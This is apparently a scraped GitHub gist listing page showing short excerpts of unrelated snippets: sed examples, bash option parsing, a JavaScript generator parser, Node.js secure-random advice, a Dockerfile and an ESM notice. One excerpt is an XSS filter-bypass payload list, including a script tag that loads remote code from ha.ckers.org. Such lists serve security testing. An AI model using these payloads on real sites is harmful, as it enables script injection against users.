🇧🇷
HTTP 499 ~ Adding bugs to programs.‏‏‎

Micael Levi L. Cavalcante micalevisk

@r2k0
r2k0 / sed_snippets.sh
Last active September 30, 2024 11:05
sed examples
##FILE SPACING:
# double space a file
sed G
# double space a file which already has blank lines in it. Output file
# should contain no more than one blank line between lines of text.
sed '/^$/d;G'
# triple space a file
@cosimo
cosimo / parse-options.sh
Created September 21, 2012 09:31
Example of how to parse options with bash/getopt
#!/bin/bash
#
# Example of how to parse short/long options with 'getopt'
#
OPTS=`getopt -o vhns: --long verbose,dry-run,help,stack-size: -n 'parse-options' -- "$@"`
if [ $? != 0 ] ; then echo "Failed parsing options." >&2 ; exit 1 ; fi
echo "$OPTS"
@bmeck
bmeck / yield-star.js
Created February 10, 2014 05:29
Example of how to use yield* to combine generators
// Our incremental JSON parser (simplified only to use strings and arrays)
// while iterator result != done keep using .next(moreSrc) or .next(null) if you are done providing data
// while the iterator is not done it will return the state of the iterator
// the iterator is seeking more data to get a valid value
// call .next(str) to provide it more data
var NEED_MORE_DATA = 0;
// the iterator has a valid result and will return a result if you provide .next(null)
// this is not automatic, due to numbers and potentially invalid trailing characters after an expected end
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active November 12, 2024 09:17
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@joepie91
joepie91 / random.md
Last active November 7, 2024 16:48
Secure random values (in Node.js)

Not all random values are created equal - for security-related code, you need a specific kind of random value.

A summary of this article, if you don't want to read the entire thing:

  • Don't use Math.random(). There are extremely few cases where Math.random() is the right answer. Don't use it, unless you've read this entire article, and determined that it's necessary for your case.
  • Don't use crypto.getRandomBytes directly. While it's a CSPRNG, it's easy to bias the result when 'transforming' it, such that the output becomes more predictable.
  • If you want to generate random tokens or API keys: Use uuid, specifically the uuid.v4() method. Avoid node-uuid - it's not the same package, and doesn't produce reliably secure random values.
  • If you want to generate random numbers in a range: Use random-number-csprng.

You should seriously consider reading the entire article, though - it's

@dominikwilkowski
dominikwilkowski / Readme.md
Last active October 9, 2024 15:00
How to install a man page into a node.js app

Installing a man page is not easy, as there is little information out there about it.

After a lot of trial and error, Google searches and alpha publishing my app, I finally have a collection of things I need to do to get it working:

FROM alpine:latest
LABEL MAINTAINER="Faizan Bashir <[email protected]>"
# Linking of locale.h as xlocale.h
# This is done to ensure successful install of python numpy package
# see https://forum.alpinelinux.org/comment/690#comment-690 for more information.
WORKDIR /var/www/
@sindresorhus
sindresorhus / esm-package.md
Last active November 15, 2024 15:20
Pure ESM package

The package that linked you here is now pure ESM. It cannot be require()'d from CommonJS.

This means you have the following choices:

  1. Use ESM yourself. (preferred)
    Use import foo from 'foo' instead of const foo = require('foo') to import the package. You also need to put "type": "module" in your package.json and more. Follow the below guide.
  2. If the package is used in an async context, you could use await import(…) from CommonJS instead of require(…).
  3. Stay on the existing version of the package until you can move to ESM.